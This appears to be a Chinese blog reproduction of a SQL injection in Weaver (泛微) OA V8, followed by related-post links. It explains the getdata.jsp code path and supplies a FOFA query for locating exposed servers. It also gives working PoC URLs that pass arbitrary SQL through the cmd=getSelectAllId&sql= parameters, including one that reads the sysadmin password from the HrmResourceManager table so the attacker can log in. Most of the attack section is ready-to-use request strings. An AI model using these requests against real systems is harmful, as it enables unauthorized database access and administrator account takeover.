2021-泛微OA V8 SQL注入漏洞
泛微OA V8 SQL注入漏洞
漏洞描述
泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限
漏洞影响
泛微OA V8
FOFA
app=“泛微-协同办公OA”
漏洞复现
在getdata.jsp中,直接将request对象交给
weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :
方法处理
在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法
Proc方法4个参数,(“空字符串”,”cmd参数值”,request对象,serverContext对象)
在proc方法中,对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
在浏览器中,构造测试URL:x.x.x.x
http://x.x.x.x/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select 38438 as id
验证poc:
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+38438+as+id
即可完成对数据库操控
POC
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)
解密后即可登录系统
sysadmin/xxxxx
2021-泛微OA V8 SQL注入漏洞相关推荐
- 泛微OA V8 SQL注入漏洞和文件上传漏洞
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...
- 【漏洞报送】泛微E-Office存在SQL注入漏洞(CNVD-2022-43246)
0x01 泛微E-Office 泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用.高效智能的原则,为企业快速 ...
- 泛微OA WorkflowCenterTreeData接口注入复现(仅限oracle数据库)
背景 2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞.该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺 ...
- 记录泛微OA服务器SQL server 无法开启解决问题
事例背景: OA服务器CPU突然标高,持续不下,一开始以为是被挖矿了,遍历程序没有找到位置或者名字的程序,重启服务器后,用杀毒软件进行了全盘扫描: 服务器:windows 2008 R2 SP1 数据 ...
- 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现
漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...
- 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改 ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- oracle 权限问题9017,泛微OA 曝出WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
玄蜂安全团队10月10日了解到.泛微OA又双叒叕曝出了一个高危漏洞.其存在点是企业使用Oracle数据库在其系统的WorkflowCenterTreeData接口处会因为内置SQL语句拼接不严导致的一 ...
- 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...
- 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...
最新文章
- R语言dplyr包为dataframe添加数据列实战( Add Columns):基于mutate()函数添加一个或者多个数据列(尾部添加、头部添加、条件生成、某个具体数据列的前后)
- java urlrewrite_Java|urlrewrite|URL重写|多个参数
- Android写的一个设置图片查看器,可以调整透明度
- c语言编程字符串_C编程中的字符串
- XRDP与VNC的关系
- 关于开学,我的心路历程~我已不想开学了
- Linux shell 中的那些你值得一试的小把戏
- 在c#中使用全局快捷键
- 【C#+SQL数据库】企业人事管理系统(含E-R图及源代码下载)
- 互联网早报20220720
- AI人工智能+大数据+ERP=?
- 一张思维导图囊括所有 Python 基础
- speedoffice如何调整Word文档表格单元格大小
- 粒子滤波(particle filtering)梳理
- python快速实现NPV净现值计算
- IC卡读卡器卡号输出格式
- tensorflow streaming_recall@kprecision@k与sklearn的区别
- 雅居乐第八届灰汤桃花节开幕在即 诸多亮点引爆三月
- ThinkPHP内核新版抢单系统,招财宝自由宝区块系统源码带门票支付与激活码功能源代码全开源无加密
- 反卷积 算法 c语言,多次曝光图像的PSF反卷积以及欠采样图像的反混叠技术I:PSFdeLRSA的制作方法...
热门文章
- 关于10进制转2进制的C语言代码
- oracle查询日期当天,oracle获取今天时间数据
- 千牛通知栏常驻是什么意思_我告诉你小米常驻通知是什么意思
- 网管服务器系统巡检报告,网络设备巡检报告-20210730125215.docx-原创力文档
- Android的三种绑定方式
- 依据前端传递的数字等生成二维码图片
- java xms xmn_java堆内存JVM属性调优总结(-Xms -Xmx -Xmn -Xss)
- 无线路由器介绍和有线路由器上网
- python制作简单网页_怎么用python简单的制作一个网页
- springboot Basic Auth 暴露API 访问认证